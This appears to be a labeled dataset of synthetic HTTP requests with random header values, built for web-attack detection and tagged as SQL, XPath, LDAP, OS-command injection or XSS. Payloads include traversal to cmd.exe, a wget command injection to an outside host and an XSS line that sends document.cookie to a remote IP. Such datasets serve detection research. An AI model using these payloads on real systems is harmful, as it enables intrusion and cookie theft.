Cookie: diolt7loaati=dica5sueyemoie2d;Vi-4GT05_=66521;de=28;sMuw=760813281;nyasuerpzd1ahs=wiJrlVPkM;rciaaxo=80
Cookie2: $Version="7"
Date: Mon, 06 Mar 06 03:29:28 UTC
ETag: "kdW8H_eGzQ8nREBeLA"
Expect: 100-continue
From: Eyi42tm7@6degzo.st
If-Modified-Since: Sat, 10 May 08 11:26:41 CET
If-Unmodified-Since: Tue, 22 Feb 05 06:14:07 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 09 Jan 08 20:52:45 CET
Max-Forwards: 80
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: hbE9e eiza=ioIeete
Range: 220121-95165
Referer: http://ishat.gov/h0padv/ctcet/eenl/vj8E7s.jsp
TE: trailers,trailers,gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/4.9 (X11; U; SunOS sun4u 8.0; ke-os; rv:0.9.0) Gecko/26153669
UA-CPU: MIPS
UA-Disp: 662,518,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 172x6984
Via: 3.9 192.186.247.121, 3.8 www.HtBr4iaa.jpg, 3.0 www.ogioi.png:460
Transfer-Encoding: gokl4m
Upgrade: oticr3/9.7
Warning: 205 www.ttrce.htm "Tia5umnten" 
X-Forwarded-For: 103.42.254.96
X-Serial-Number: 09611302404410791541
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49808
Start - Id: 43131
class: OsCommanding
GET /hndlDZ0A/hC.E@P_c@/eJphv4R-en-cumm9B/imf/iaailrnere/eldirRhvzno3Et7Ziep/a58kwAvJ1/hezefeea/pr/dx/xHmmochag.css?2olTGfY=oEXnlaK%40&piwr=+8urlo+auasi&rsbHnoaU=30132&KSPwincludefromq-5w=ih%3CvlinketcDsaru&H_Uwxh=8TSj.PiG6CD&ntdeIohBptic=%5Cnls++%2Froot%2F HTTP/1.1
Host: 152.229.154.14:0335
Connection: keep-alive
Accept: text/*, video/quicktime
Accept-Charset: koi8-r;q=0.0, iso-8859-3;q=0.2, windows-1258
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-age=08
Client-ip: 171.241.211.11
Cookie: ub1=5607319528;LeEMncandMcAL6o=1064874366
Cookie2: $Version="5"
Date: Wed, 27 Jun 07 07:36:51 GMT
ETag: W/"j5PMXW@J9gNIgeb4CyoO"
Expect: 100-continue
From: ndud@rzo8frE.cz
If-Modified-Since: Mon, 09 Aug 04 08:16:29 UTC
If-Unmodified-Since: Tue, 31 Aug 04 16:56:28 UTC
If-Match: *
If-None-Match: *
If-Range: "3xBgA5RRYnUytdbLlJ"
Max-Forwards: 85
MIME-Version: 2.7
Pragma: musoieng=h5ntRh
Proxy-Authorization: qgem2 pmastofe=hwHts
Authorization: Digest realm
Range: 94856-,22-022
Referer: /meas/earahh.exe
TE: chunked;q=0.8,chunked;q=0.5,trailers
Trailer: Connection
User-Agent: Mozilla/4.9 (compatible; MSIE 6.3; Win 9x; Grtoinero; nn2o; vusdnd7ihf)
UA-CPU: Sparc
UA-Disp: 5887,6465,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 556x187
Via: 0.2 www.ieas8Tn.jpg, 6.0 142.98.198.175, urfon/7.8 88.245.106.96
Transfer-Encoding: compress
Upgrade: ftb/0.9, eeti/9.1
Warning: 169 190.90.41.27 "mteulHh6dilaof" 
X-Forwarded-For: 209.100.60.54
X-Serial-Number: 231798615796568
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43131
Start - Id: 35122
class: SqlInjection
POST /aohpNf0/Un56vj2@2Q.HC/a1kVbm/rdgk/H0858ei6MEf/enbo/bXQnckdD9PZopt./OWzv6Nxp_/nMFjFXd3pIRuX1oL/VavtiEhkinn/dVf@_R.shtml? HTTP/1.1
Content-Length: 397
Content-Language: utc,aMet,6Gdz
Content-Encoding: compress
Content-Location: /do8hr5/sseyont/186sreN/ecTeso/tb7tkmt.cgi
Content-MD5: ZXNzbmNhYjFrb2VkZW9tYw==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sun, 22 Oct 06 21:35:33 CET
Host: 74.123.174.188
Connection: close
Accept: */*;q=0.7
Accept-Charset: windows-1252;q=0.8, cp-950;q=0.7, x-mac-hebrew;q=0.6
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 104.9.2.127
Cookie2: $Version="43"
Date: Sun, 04 Apr 04 21:08:15 CET
Expect: otivt=3rMnsoaS
If-Modified-Since: Sat, 14 May 05 08:23:53 UTC
If-Unmodified-Since: Mon, 28 Jan 08 20:40:25 CET
If-None-Match: "IqZKmOoHrd@xw-iN6"
If-Range: Wed, 09 Jun 04 04:31:57 GMT
Max-Forwards: 6
Pragma: no-cache
Authorization: Basic dW82dDplZW9l
Range: 255878-
Referer: http://hgihmp.ch/ieunrdoE/es4i/eeThjX/eihd/5wBit0.html
TE: trailers,trailers,deflate
User-Agent: Mozilla/0.4 (Windows; U; Win 9x 5.7; o1-8e; rv:9.1.0) Gecko/78357212
UA-Disp: 124,974,8
UA-OS: Win98
Via: HTTP/1.0 www.golaGf.png
Transfer-Encoding: rdtn
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

anr=SmM&fssdhgt9=e&idhukn=intMWnY&Eiin=6437570231&3Z5vS18JdZ=7&@2Ki=els0jnwaysSne&gZns=uL7-Wlu&TewwgetpZ=5&y6hh-EV5Kwinnt=zkNgjtn6J&zwynltre=niyo Adhw ktb&u8QCBGr7N1=yat&INlV4uRHQp='select     customer_phone     '||'from    customers     '||'where   customer_surname='''||     lv_surname||'''    and  customer_type=1';&htttlgbsteoVhls=3013&sln=mE/rn

End - Id: 35122
Start - Id: 48984
class: XPathInjection
GET /duGvmFzLbOp_Z/hcZKC/11GltorncsoWyeee1/h0x7jpd-kuj0EK/qrOayAjWWgGB.wel/gmdomnRsjsAdhA4eeeo/g@y6nCE3cQ7F3IeqEYz/hh44egr67TtatoztU/x8/m1yq.xMQnH.php3?nmon=%29%3Ahensavbscriptochttpa+htaccesbb+%40scriptt&r8irtGtin3zHai=80741224&tnh=eex&Ruhp8a=xsble%27+or+++%28i+%3C++++count%28tT%2Fchild%3A%3Atext%28%29%29++and+++j++++%3C+count%28totj%2Fchild%3A%3Acomment%28%29%29+and++++k++++%3C+++++count%28r5r0h%2Fchild%3A%3A*%29++++%29+++++or++%27erete8ee%27+%3D+++%27+Vc%27++++or&zcdi=4hbotce&rnott8ntLde=oji2nehhMtDe&eiii6usftwdr5re=WEsRn%5Dlatcg+&Etose4f2mndodom=qh7va1iAtnr&trmlahp9ameo=Sn+A8lozretotmp&hYl=724942&c7zaw2e=tht&qh1vny=%2Fuldc3e HTTP/1.1
Host: 6.202.199.218
Connection: fN4et
Accept: */*;q=0.9
Accept-Charset: iso-8859-2;q=0.8, x-mac-greek;q=0.7
Accept-Encoding: identity;q=0.1
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 102.111.118.138
Cookie: hwsUw=ainnfl:ehhttpgroup by;rtrsesiiwqsajss=access_logs?n q9zgroup byobjectWlhome;vhMheeiIhnbla=pErethe8thih
Cookie2: $Version="7"
Date: Sat, 09 Aug 08 03:03:08 UTC
ETag: "SIuC_mG3.D_K.LlO5Dn"
Expect: ovnum=suieMbtt
From: 6icshpO@RtgPShLon.org
If-Modified-Since: Sat, 17 Dec 05 09:19:30 CET
If-Unmodified-Since: Mon, 19 Sep 05 05:27:28 UTC
If-Match: "Ji1bZJJEocmtxGF9aP"
If-None-Match: "MhMW9yZqmYbYFs9"
If-Range: Fri, 12 Jun 09 02:15:26 UTC
Max-Forwards: 669
MIME-Version: 7.4
Pragma: Qi='eitIu'
Proxy-Authorization: 1mml leiEsi=hessd
Authorization: Basic aWxlSGtTZjpvcnJ1bGg=
Range: 23-,057-,45-
Referer: http://pa4hfi1E.st/rbsgieo/er3s/nsrIaP/et1en/rkpuIs4.mdb
TE: trailers,trailers,gzip;q=0.9
Trailer: Accept-Encoding
User-Agent: Mozilla/4.5 (Machintosh; U; Mac OS X 3.8; eo-9g; rv:9.5.0) Gecko/28653810
UA-CPU: 68000
UA-Disp: 8493,346,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 8171x6640
Via: glhd7/1.4 www.REHk.gif
Transfer-Encoding: compress
Upgrade: ridti/5.6, m2mn/9.7, 5cse/3.2, eaEos/5.1
Warning: 248 www.elmeri.shtml "SdvreCihiq" 
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48984
Start - Id: 35753
class: XPathInjection
GET /chvylN/o36xrfoc92avedotelno/o3m-v56sb8MEnc/ES/wJ3Um4/obwWhlr/apveoanll/nifEs/Goaociiego.asmx?sttrldye6i=2oluadta&tg=egssnOsuopena&iwteer=e8n%2B1uconnect403bautoexec&cedest=8&Saa=11&mboot.ini1img=127246236&nyhaeAiu7bouo=otdto&nhPiirnmer=kl&tMeLrCJ=83c5t1%27+++++or+++1%3C+++++eni%2FnarIn%2Fs6%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D84%5D++or++++%27nslrnt0e%27++++%3D++++%27&sRJCG=%28esss&Diz2ieJ=uei3nhAhs&mjr9un=pnteanmf&n4nAcrnu9d0=0337&0co=440728 HTTP/1.0
Host: 125.108.49.37
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 54.55.177.74
Cookie: imh6yeYte=c2qtis\id;63xterm.vC=Se;raaAusrleltr\g;5PkSunionlibI=childsgbtq;s3At0labodtr3=aFrc7ratne;tTN=87759
Cookie2: $Version="40"
Date: Mon, 27 Dec 04 16:01:26 GMT
ETag: "Y2G28OgdZeEhliz"
Expect: ir13aesi=oye3fea;4ez86tn=EcuoTpy
From: nsEeee@gxtagow.be
If-Modified-Since: Sat, 26 Nov 05 05:31:57 GMT
If-Unmodified-Since: Fri, 10 Oct 08 06:02:25 UTC
If-Match: "Rqk.CsPwaBTeNP_0"
If-None-Match: *
If-Range: Fri, 08 Jul 05 09:15:50 GMT
Max-Forwards: 771
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: adwi etihc=5lIn4t
Authorization: Digest username="ectz2a"
Range: 912919-0,159182-1735
Referer: /nhcbcu/n6ce/dhennhi/s7geonrd.jpeg
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: lodpwd/3.3.6.4
UA-CPU: x86
UA-Disp: 8135,7731,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 3536x0104
Via: ddlt/5.7 66.142.214.252, 0.6 150.52.252.14, HTTP/8.1 www.haih9pe.jpg
Transfer-Encoding: gzip
Upgrade: Toa/4.1
Warning: 145 165.132.233.207 "niz6ueo" "Sun, 02 Mar 08 13:20:23 UTC"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 040193563593
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35753
Start - Id: 49971
class: XPathInjection
GET /QMiOYnAY/4.wkrUlhD/teuaew/aouraolyehrw/AcoiirrtlnlDwqaK/ztM/fNk3S.exe?nEyoiemosituvt=95&tpyvI=31002470&tlubtem6=onG5eVmVIXA&s7iO25se2eiyee=%28i+%3C++count%28eN88%2Fchild%3A%3Atext%28%29%29+++++and+j++%3C+++++count%28nzrEso%2Fchild%3A%3Acomment%28%29%29+++++and++k+++%3C+++++count%28eohT%2Fchild%3A%3A*%29+++%29 HTTP/1.0
Host: www.eapocja.cz
Connection: keep-alive
Accept: audio/x-wav, audio/x-wav;q=0.4
Accept-Charset: x-mac-chinesetrad, x-mac-cyrillic, iso-8859-8, x-mac-ce, iso-8859-6;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 164.99.223.41
Date: Mon, 24 Sep 07 04:26:32 GMT
ETag: W/"WSy3s1khQ_tRVv5FBi"
Expect: ahthray
From: eovis@cg5u.be
If-Modified-Since: Sat, 27 Aug 05 05:47:42 GMT
If-Unmodified-Since: Sat, 16 May 09 04:40:00 GMT
If-Match: "O-qMEhe5FYWPFs_0Wl"
If-None-Match: "1Nzn24KNu1dwH3r4"
If-Range: Sat, 18 Feb 06 24:25:48 GMT
Max-Forwards: 3
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Digest cnonce="drtr"
Authorization: Basic Z3NhYWE6bWt0bw==
Referer: http://www.yosptaI.fr/a1thse9e.php
TE: chunked;q=0.8
Trailer: Accept-Encoding
User-Agent: tdCZ0F_0 http://www.oMeclt.fr
UA-OS: Linux
Via: hsl1rl/9.7 www.enEch.gif
Transfer-Encoding: gzip
X-Serial-Number: 91978245471
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49971
Start - Id: 43799
class: OsCommanding
GET /PBServer/..��../..��../..��../winnt/system32/cmd.exe?/c+dir+c:0 HTTP/1.1
Host: www.9lug2R.com
Connection: aih2
Accept: text/*
Accept-Charset: *
Accept-Encoding: gzip, deflate
Accept-Language: *;q=0.3
Cache-Control: max-age=7778
Client-ip: 209.54.112.168
Cookie: arjat=fromighttp;oq8rude=wN5D7yB;Tj0p=ouziigrtnufde;@W0OnexecG5aR=7niHtls;wpsJuR=36159532;XAYEkK.gphp=Tlr t
Cookie2: $Version="3"
Date: Sun, 15 Jun 08 16:21:43 UTC
ETag: "4oKNvrNCIHYKhCU0chJP"
Expect: dhegnagd=62iivlh3;nnyeyrs=kyKh
From: qto7read@r8owxth.de
If-Modified-Since: Tue, 20 Sep 05 16:12:49 UTC
If-Unmodified-Since: Sat, 07 Nov 09 21:22:36 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 13 Jul 04 16:04:14 GMT
Max-Forwards: 039
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="h4nye"
Authorization: Digest realm
Range: 904036-,02113-35,44499-
Referer: /tytolt/rzja4h.php4
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/9.8 (Windows; U; WinNT 3.8; ea-ta; rv:2.2.5) Gecko/45822531
UA-CPU: Sparc
UA-Disp: 7509,580,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 697x813
Via: FTP/0.9 46.63.122.3:505, 6.9 81.99.54.253:659
Transfer-Encoding: identity
Upgrade: Vsr3e/6.8
Warning: 815 www.nitmdae.gif "rfe4pvnricgalni" 
X-Forwarded-For: 203.135.237.55
X-Serial-Number: 055444693738
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 43799
Start - Id: 44436
class: OsCommanding
GET /ssi/envout.bat?|dir%20..............1 HTTP/1.0
Host: www.yvcn.be
Connection: 6dn8rI
Accept: */*;q=0.2
Accept-Charset: iso-10646-ucs-2, euc-jp;q=0.9, iso-2022-kr;q=0.9, euc-jp, koi8
Accept-Encoding: 
Accept-Language: e93-KL;q=0.3, jgVaath-eeo1h;q=0.0, r-afezyn9;q=0.9
Cache-Control: no-cache
Client-ip: 206.122.45.166
Cookie: s7Eehtacces=qnoe0dIEgro/\U;v78qeOG=0it;hcavT8pilWaqT=u$l$hotmailseusrhks;rltnrs99sloatea=xsEniw6L
Cookie2: $Version="65"
Date: Tue, 10 May 05 13:52:42 CET
ETag: "2tnZ37xD4wGUw-x"
Expect: 100-continue
From: unh1Ohh@nhsboy.biz
If-Modified-Since: Fri, 20 Aug 04 18:24:18 CET
If-Unmodified-Since: Sat, 13 Oct 07 16:08:45 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 58
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic aWVzODp5ZWh5aQ==
Authorization: NTLM b2VvbG5zT2dlZlJBaDBRQ3RnZW9BcmZmbnlsaDZoOXRlaDRyd3Nod3NwMWk=
Range: 6-02287,72753-
Referer: http://teiazma.biz/0ie1w.php3
TE: trailers,deflate,trailers
Trailer: From
User-Agent: edoIA/1.1.0
UA-CPU: Sparc
UA-Disp: 023,120,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 053x237
Via: FTP/3.9 88.149.17.219, FTP/8.8 www.7wamwAnn.png, 0.3 www.1s8n.htm
Transfer-Encoding: compress
Upgrade: Sarc/2.6, 8ei9c/3.9, zhD/9.6
Warning: 041 www.nmtu.css:96410 "tmhhadncfjtereqA" "Mon, 28 Sep 09 17:32:04 UTC"
X-Forwarded-For: 1.199.151.97
X-Serial-Number: 42253
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 44436
Start - Id: 38925
class: LdapInjection
GET /tsfe/znkm2/naaRxs5e/Eied3xopfas/itzadem/gsorsrPaals/icheW3terv8ey6iNiaTh.shtml?0yenegx7=deletesaandg3&keo=48481&4n8FG=5%25ue%26&x0rsytIO=%29++%28++%7C%28displayName%3Dhad*%29++++%28name%3D+had*+++%29%28++mail%3Dhad*%29&Zeehr=4137 HTTP/1.0
Host: 106.58.198.14
Connection: 2uejo
Accept: video/quicktime
Accept-Charset: x-mac-japanese;q=0.3, x-mac-icelandic, x-mac-cyrillic, cp-932;q=0.2, x-mac-greek
Accept-Encoding: identity
Accept-Language: j-so;q=0.7, h-rx4toaee;q=0.4, tsrmeemi-dT;q=0.2, a-M2uj;q=0.0
Cache-Control: no-store
Client-ip: 200.72.166.1
Cookie: Un=mej;tohslmly=er<tm
Cookie2: $Version="0"
Date: Mon, 19 Apr 04 07:38:09 UTC
ETag: "YohW@GfSH_k7Q_NUvl"
Expect: t21byh
From: Utnn8c@iodssieo.biz
If-Modified-Since: Sun, 19 Oct 08 07:21:34 CET
If-Unmodified-Since: Sun, 12 Jul 09 14:21:09 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 24
MIME-Version: 7.2
Pragma: emid=ct
Proxy-Authorization: mtSl wopwaseh=raeaa
Authorization: Basic YWxvMGY6dGloaXQyZQ==
Range: 49-,0149-664723,864-
Referer: http://od7rma.st/crspsun/qhbesh.php4
TE: trailers,deflate
Trailer: Pragma
User-Agent: sbQrFFW http://www.7oawo.st
UA-CPU: Sparc
UA-Disp: 518,9521,8
UA-OS: Windows 98
UA-Pixels: 024x188
Via: FTP/2.6 www.elUihiei.png, HTTP/8.6 113.21.215.92, 8.3 121.63.118.97
Transfer-Encoding: deflate
Upgrade: tydnft/3.9, LrdO/1.4, een6vn/4.0
Warning: 241 39.229.17.174:8 "buhh0su2aszm" 
X-Forwarded-For: 212.86.228.108
X-Serial-Number: 498357729
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38925
Start - Id: 46682
class: XSS
GET /g2Hon7lionznnrethp/CH4v9v/clcaEmteEsrsccjg5ho/adxjXBDf2JNCUonCn/wblkninMprOt7Boo/dgQRN8B8n/eYE86t2e4ty4/GqiZUfYZNZ6/n4JBgYV0UTxi0i/103CHpasswdzpiframeN/rQ5HK0ul/8VvABAP9NssPsj.jsp?Izc=eoEzxlTpth&httpBwinntedS=hpp&i0doNmb=6534347083&8c6eesote7fh=%3Beet+%5BvinsertomQbin HTTP/1.1
Host: 195.178.138.73
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: max-age=543
Client-ip: 113.189.52.52
Cookie: Feosmhatotd=<input    type    =   "image     "     dynsrc    ="  javascript:    [alert    ('dm');]  " >
Cookie2: $Version="94"
Date: Sun, 19 Jul 09 24:01:58 GMT
ETag: W/"4Mg-80aLzPHGD8aln0L"
Expect: wNio=a8ou;fxmb=9scx
From: ekionh@nouustph.biz
If-Modified-Since: Wed, 25 Jan 06 09:24:48 UTC
If-Unmodified-Since: Fri, 02 Mar 07 16:16:32 CET
If-Match: "zGsUOWWOtrO9udU"
If-None-Match: *
If-Range: Thu, 02 Dec 04 17:42:18 UTC
Max-Forwards: 8
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: NTLM eW5Pb3ZhZGNzN2hzaHJyeGNTbmlzZWV0YmVydGxvcmVh
Authorization: NTLM TnRpbnNOdXJmdDh0aXNvbHNOeG5lc3dlc2FybHR1YW5oZWlyemtlZW15YmlUb3Jw
Range: 2194-5461,312-2895
Referer: /llbrelry.tiff
TE: chunked,trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/9.0 (X11; U; Open BSD i586 0.3; p2-ea; rv:5.7.2) Gecko/42186537
UA-CPU: x86
UA-Disp: 445,3184,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 630x4242
Via: HTTP/5.9 134.189.230.91, FTP/6.5 241.178.166.146
Transfer-Encoding: identity
Upgrade: NNutal/3.3, Zdxhh/3.9
Warning: 142 198.194.142.50 "nwxrb2ahoh62t06" 
X-Forwarded-For: 36.143.183.170
X-Serial-Number: 49725305842038917
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46682
Start - Id: 43322
class: OsCommanding
GET /o5esZEMi6Rh@blU/hQvgV9U-/s@@Lev7ry3MeF-s-/e.NuaYlq/tyxx/sFFIo151gaal9NzoixPS/o9_IS2o8HOgo7w9/tfetrs/7T_zub8/tbHhti.dll?mci4iat2aeIv84=%22%3B+++%2Fusr%2Fbin%2Fwget+++www.timeteinni.com%2Fve++++%3B HTTP/1.0
Host: www.m8ruoa.uk
Connection: 8oms5gYo
Accept: application/*, image/*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: at3ec8-zna, dsto-teicvmt, cc-c, ns-eE8l;q=0.9, id-leod
Cache-Control: max-age=013
Client-ip: 86.69.183.54
Cookie: jrnrfrthtnlon=Morhesa17hwP;FVG@DD=aartf;in=$ooeh|wgeteopt)zae ooh;sO=96;sdrp=r5WlaieeM;t5Pg_sXPW9A=zsahw
Cookie2: $Version="3"
Date: Fri, 01 Jul 05 18:50:45 GMT
ETag: "L6Op1aeDmT9K1KLGR"
Expect: trl2g=ErI0fhr
From: eTnr@war0.be
If-Modified-Since: Thu, 08 Jan 09 08:45:51 GMT
If-Unmodified-Since: Tue, 02 Dec 08 22:59:24 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 29 Apr 10 20:00:33 GMT
Max-Forwards: 0181
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: NTLM aXlCUG5Zbm5ybXJ0aUZ6dG85SXdlaGVmZ2ZkaXVhZ2Rkdnlpb25saGJL
Authorization: eDloa hhEAnpe=aemiftda
Range: 2030-1
Referer: /seLeAb/nei3odiv/Drhieae/Prol.pdf
TE: trailers,trailers,gzip
Trailer: Authorization
User-Agent: Mozilla/1.0 (compatible; Konqueror/9.5; Open BSD i586; eftgthy)
UA-CPU: 68000
UA-Disp: 260,218,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 3321x719
Via: N7sh/4.1 24.211.19.116, FTP/9.6 www.pshucd.jpg
Transfer-Encoding: gzip
Upgrade: eCaleh/5.6, orv/6.7, AtlTSf/2.9, td7/4.6
Warning: 213 www.e6ttha.html:3574 "evi1u0aas9lO3ep" 
X-Forwarded-For: 213.135.117.46
X-Serial-Number: 356926769417178111
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43322
Start - Id: 46828
class: XSS
PUT /ayesesh1/hv25TnfjenIEWDo/riw/A-CG/s3UXRF1gEjiTyonplO/dda9e/KzkuPKF/eOZirX@aq@N1/3lsU@I/Uszy7of.jpg? HTTP/1.0
Content-Length: 392
Content-Language: za8ds,otEs,dhh9d5bs
Content-Encoding: identity
Content-Location: /th7ub7/E87hfs/6riot/rXLeaId.tiff
Content-MD5: b0E5ZXRnbmwxNnRhbmh0bg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 02 Nov 07 15:31:41 CET
Last-Modified: Thu, 11 Mar 04 07:03:38 GMT
Host: 89.66.17.208:9
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: whe-clsrso;q=0.9
Cache-Control: only-if-cached
Client-ip: 169.136.109.14
Cookie: oRrArl5t7cd=ss;4SeElehrut=9Itx iekrRbr
Cookie2: $Version="28"
Date: Thu, 26 Mar 09 02:16:51 CET
ETag: W/"CE44HJExLHf9qTC"
Expect: 100-continue
From: gUtdmw@nhajiIe.be
If-Modified-Since: Wed, 04 Jul 07 15:53:47 UTC
If-Unmodified-Since: Sat, 17 May 08 02:53:56 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="dGncrnt"
Authorization: Digest cnonce="rw8aho"
Range: 04-141477,-19
Referer: /hwltldd/stiw/oen2hwi/si3dttt/Utsrnngi.swf
TE: chunked;q=0.6
Trailer: If-None-Match
User-Agent: Ttdee (tlp3NC1RFG; daOtHo; kJXHlx9o)
UA-CPU: Sparc
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 818x5674
Via: 1.8 www.uD2z.jpg, 7.8 www.tog7ty.jpeg, FTP/3.6 159.200.13.179
Transfer-Encoding: identity
Upgrade: dmhn/6.6, j0orh/4.6
Warning: 012 66.34.17.105 "buyInnrnE" 
X-Forwarded-For: 90.185.191.90
X-Serial-Number: 072274181665
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

s.Klay6O=i9jGH6ruvkc&Ubmtsr5wse=nsn&8AiatzlTuw=<img    src  =  " livescript:[window.open('http://69.85.149.57/olle.pl'+document.cookie);]     "  >&e3emrpNtnHenaO=opt)6aal &iofett=snfolqn8dou&D3-31cP7Ik_=emeexecy&hg2n1=114853&pR1-openbCIS=i&inputVTEconnectsr9x=zntrdf7mbhef&ity4sect8cvoot=]rnd&xwpf7nx6apabort=ton7lMboe&group by7-oVCZb=otua ssarke65tmpn

End - Id: 46828
Start - Id: 41198
class: SqlInjection
GET /lMWb.LYb3LM1S5ScQ/STqT/dpda_sHH.php3? HTTP/1.1
Host: 111.182.115.248
Connection: close
Accept: */*;q=0.2
Accept-Charset: euc-cn;q=0.0, x-mac-cyrillic;q=0.1, x-mac-roman;q=0.2, x-mac-turkish
Accept-Encoding: 
Accept-Language: or    0<>(select     count(*) from    ihttue9)
Cache-Control: only-if-cached
Client-ip: 28.28.15.165
Cookie: eds=ey;gnlrlnc=s5YH
Cookie2: $Version="59"
Date: Thu, 14 Jun 07 14:53:24 CET
ETag: W/"EEGkhT5mI@eMWl_1"
Expect: zntAl=aettnsu;puaaigrn
From: dH7gh@vEohnlmirz.net
If-Modified-Since: Thu, 17 Feb 05 18:11:01 UTC
If-Unmodified-Since: Mon, 10 Mar 08 13:05:15 UTC
If-Match: "VLk6Hk1THR8xrseFm9"
If-None-Match: "HpaNwuQLt.8twM35"
If-Range: *
Max-Forwards: 3250
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: QnNEm sle7s=ykdes
Authorization: Digest cnonce="jnEa"
Range: 38-,7259-27,6749-28
Referer: /cOrw2/tltta/elVeiL/ftuu/oxdnente.wmn
TE: trailers,trailers
Trailer: Referer
User-Agent: cN5fqSCAg4 http://www.rjooS.it
UA-CPU: MIPS
UA-Disp: 8221,0714,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 9560x6945
Via: 2.9 71.4.185.68:81, 0mshp/5.6 www.s6xet.htm:04450
Transfer-Encoding: cowmit; cInc=evo6et
Upgrade: palt/3.5, ine2/0.4
Warning: 671 80.33.40.15 "i4sm64ftefxa" "Thu, 27 Jan 05 16:05:22 CET"
X-Forwarded-For: 25.2.55.98
X-Serial-Number: 9505530425947859
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 41198
Start - Id: 38480
class: LdapInjection
GET /o6dYSZ.76aWX/iv/Mc/t2nUTXGsam3-ax/nGYi2bD/Rn/o3nue/hpameMet/dE/rWU6IFvYWppwZP.bin?g26oseTP=7426516421&ro4unjncth=1nwrnsntgi&mdt=64254&.jIN-wY-bE=62Uqylpul&iHnsg3ht1ead=ibesdxfhlnhdsr&xCV17=ekusaua%5C+ib&An0e0mStAdspaI=0bdivdOrhscei&rsaTidseeSjOe=%29++%28+%7C%28++++cn%3D*o+%27brien*++++%29%28mail++++%3D*o+%27brien*+++%29&Ed5njRligothirl=Ys9niibd HTTP/1.0
Host: 240.5.233.59
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: wf5rdo-uc, fd-Qvmv;q=0.9, niO7a-bjo
Cache-Control: only-if-cached
Client-ip: 50.101.101.125
Cookie: noiatSeen=462VQqZi3wzp;prz9Lt=51852086;rrei=)yiwhereoc?risimgrt;oereD=btpkeoto
Cookie2: $Version="51"
Date: Fri, 27 Apr 07 03:45:10 UTC
ETag: W/"HdLDJ1hGjmZABeS"
Expect: stre=tmrfue
From: b8antatt@o1neid.cz
If-Modified-Since: Mon, 09 Nov 09 24:09:15 GMT
If-Unmodified-Since: Sun, 01 Aug 04 16:57:57 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 27 Mar 09 18:48:59 UTC
Max-Forwards: 636
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Digest opaque="kmaaul"
Authorization: e3so Mi1j=ti5Td
Range: 58935-,-048057,4298-
Referer: /yhqSo/tajh/oAeItm.mdb
TE: chunked,gzip,gzip
Trailer: Cache-Control
